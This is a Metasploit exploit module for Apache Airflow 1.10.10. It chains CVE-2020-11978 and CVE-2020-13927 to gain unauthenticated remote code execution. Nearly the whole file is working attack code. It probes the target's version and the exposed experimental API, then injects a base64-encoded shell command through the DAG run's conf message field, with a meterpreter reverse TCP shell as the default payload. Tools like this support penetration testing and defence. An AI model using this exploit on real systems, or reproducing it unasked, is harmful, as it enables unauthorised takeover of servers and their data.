##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Apache Airflow 1.10.10 - Example DAG Remote Code Execution',
        'Description' => %q{
          This module exploits an unauthenticated command injection vulnerability
          by combining two critical vulnerabilities in Apache Airflow 1.10.10.
          The first, CVE-2020-11978, is an authenticated command injection vulnerability
          found in one of Airflow's example DAGs, "example_trigger_target_dag", which
          allows any authenticated user to run arbitrary OS commands as the user
          running Airflow Worker/Scheduler. The second, CVE-2020-13927, is a default
          setting of Airflow 1.10.10 that allows unauthenticated access to Airflow's
          Experimental REST API to perform malicious actions such as creating the
          vulnerable DAG above. The two CVEs taken together allow vulnerable DAG creation
          and command injection, leading to unauthenticated remote code execution.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'xuxiang',            # Original discovery and CVE submission
          'Pepe Berba',         # ExploitDB author
          'Ismail E. Dawoodjee' # Metasploit module author
        ],
        'References' => [
          [ 'EDB', '49927' ],
          [ 'CVE', '2020-11978' ],
          [ 'CVE', '2020-13927' ],
          [ 'URL', 'https://github.com/pberba/CVE-2020-11978/' ],
          [ 'URL', 'https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljx' ],
          [ 'URL', 'https://lists.apache.org/thread/mq1bpqf3ztg1nhyc5qbrjobfrzttwx1d' ],
        ],
        'Platform' => ['linux', 'unix'],
        'Arch' => ARCH_CMD,
        'Targets' => [
          [
            'Unix Command', { 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/python/meterpreter_reverse_tcp' } }
          ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '2020-07-14',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
        }
      )
    )
    register_options(
      [
        Opt::RPORT(8080, true, 'Apache Airflow webserver default port'),
        OptString.new('TARGETURI', [ true, 'Base path', '/' ]),
        OptString.new('DAG_PATH', [
          true,
          'Path to vulnerable example DAG',
          '/api/experimental/dags/example_trigger_target_dag'
        ]),
        OptInt.new('TIMEOUT', [true, 'How long to wait for payload execution (seconds)', 120])
      ]
    )
  end

  def check
    uri = normalize_uri(target_uri.path, 'admin', 'airflow', 'login')
    vprint_status("Checking target web server for a response at: #{full_uri(uri)}")
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => uri
    })

    unless res
      return CheckCode::Unknown('Target did not respond to check request.')
    end

    unless res.code == 200 &&
           res.body.downcase.include?('admin') &&
           res.body.downcase.include?('_csrf_token') &&
           res.body.downcase.include?('sign in to airflow')
      return CheckCode::Unknown('Target is not running Apache Airflow.')
    end

    vprint_good('Target is running Apache Airflow.')

    vprint_status('Checking Apache Airflow version...')
    version_number = res.body.to_s.scan(
      %r{<a href="https://airflow[.]apache[.]org/docs/([\d.]+)"}
    ).flatten.first

    unless version_number
      return CheckCode::Detected('Apache Airflow version cannot be determined.')
    end

    unless Rex::Version.new(version_number) < Rex::Version.new('1.10.11')
      return CheckCode::Safe
    end

    vprint_status(
      "Target is running Apache Airflow Version #{version_number}. " \
      'Performing additional checks for exploitability...'
    )

    check_api
    check_task
    check_unpaused

    return CheckCode::Appears
  end

  def check_api
    uri = normalize_uri(target_uri.path, 'api', 'experimental', 'test')
    vprint_status("Checking if Airflow Experimental REST API is accessible at: #{full_uri(uri)}")
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => uri
    })

    unless res && res.code == 200
      return CheckCode::Safe('Could not access the Airflow Experimental REST API.')
    end

    vprint_good('Airflow Experimental REST API is accessible.')
  end

  def check_task
    uri = normalize_uri(target_uri.path, datastore['DAG_PATH'], 'tasks', 'bash_task')
    vprint_status('Checking for vulnerability of "example_trigger_target_dag.bash_task"...')
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => uri
    })

    unless res && res.code == 200
      return CheckCode::Safe(
        'Could not find "example_trigger_target_dag.bash_task". ' \
        'Target is not vulnerable to CVE-2020-11978.'
      )
    end

    if res.get_json_document['env'].include?('dag_run')
      return CheckCode::Safe(
        'The "example_trigger_target_dag.bash_task" is patched. ' \
        'Target is not vulnerable to CVE-2020-11978.'
      )
    end

    vprint_good('The "example_trigger_target_dag.bash_task" is vulnerable.')
  end

  def check_unpaused
    uri = normalize_uri(target_uri.path, datastore['DAG_PATH'], 'paused', 'false')
    vprint_status('Checking if "example_trigger_target_dag.bash_task" can be unpaused...')
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => uri
    })

    unless res && res.code == 200
      return CheckCode::Safe(
        'Could not unpause "example_trigger_target_dag.bash_task". ' \
        'Example DAGs were not loaded.'
      )
    end

    vprint_good('The "example_trigger_target_dag.bash_task" is unpaused.')
  end

  def create_dag(cmd)
    cmd = "echo #{Base64.strict_encode64(cmd)} | base64 -d | sh"
    uri = normalize_uri(target_uri.path, datastore['DAG_PATH'], 'dag_runs')
    vprint_status('Creating a new vulnerable DAG...')
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => uri,
      'ctype' => 'application/json',
      'data' => JSON.generate({ conf: { message: "\"; #{cmd};#" } })
    })

    unless res && res.code == 200
      fail_with(Failure::PayloadFailed, 'Failed to create DAG.')
    end

    print_good("Successfully created DAG: #{res.get_json_document['message']}")
    return res.get_json_document['execution_date']
  end

  def await_execution(execution_date)
    uri = normalize_uri(
      target_uri.path,
      datastore['DAG_PATH'],
      'dag_runs', execution_date, 'tasks', 'bash_task'
    )
    print_status('Waiting for Scheduler to run the vulnerable DAG. This might take a while...')
    vprint_warning('If the Bash task is never queued, then the Scheduler might not be running.')

    i = 0
    loop do
      i += 1
      sleep(10)
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => uri
      })

      unless res && res.code == 200
        fail_with(Failure::Unknown, 'Bash task state cannot be determined.')
      end

      state = res.get_json_document['state']
      if state == 'queued'
        print_status('Bash task is queued...')
      elsif state == 'running'
        print_good('Bash task is running. Expect a session if executed successfully.')
        break
      elsif state == 'success'
        print_good('Successfully ran Bash task. Expect a session soon.')
        break
      elsif state == 'None'
        print_warning('Bash task is not yet queued...')
      elsif state == 'scheduled'
        print_status('Bash task is scheduled...')
      else
        print_status("Bash task state: #{state}.")
        break
      end
      # stop loop when timeout
      next unless datastore['TIMEOUT'] <= 10 * i

      fail_with(Failure::TimeoutExpired,
                'Bash task did not run within the specified time ' \
                "- #{datastore['TIMEOUT']} seconds.")
    end
  end

  def exploit
    print_status("Executing TARGET: \"#{target.name}\" with PAYLOAD: \"#{datastore['PAYLOAD']}\"")
    execution_date = create_dag(payload.encoded)
    await_execution(execution_date)
  end
end
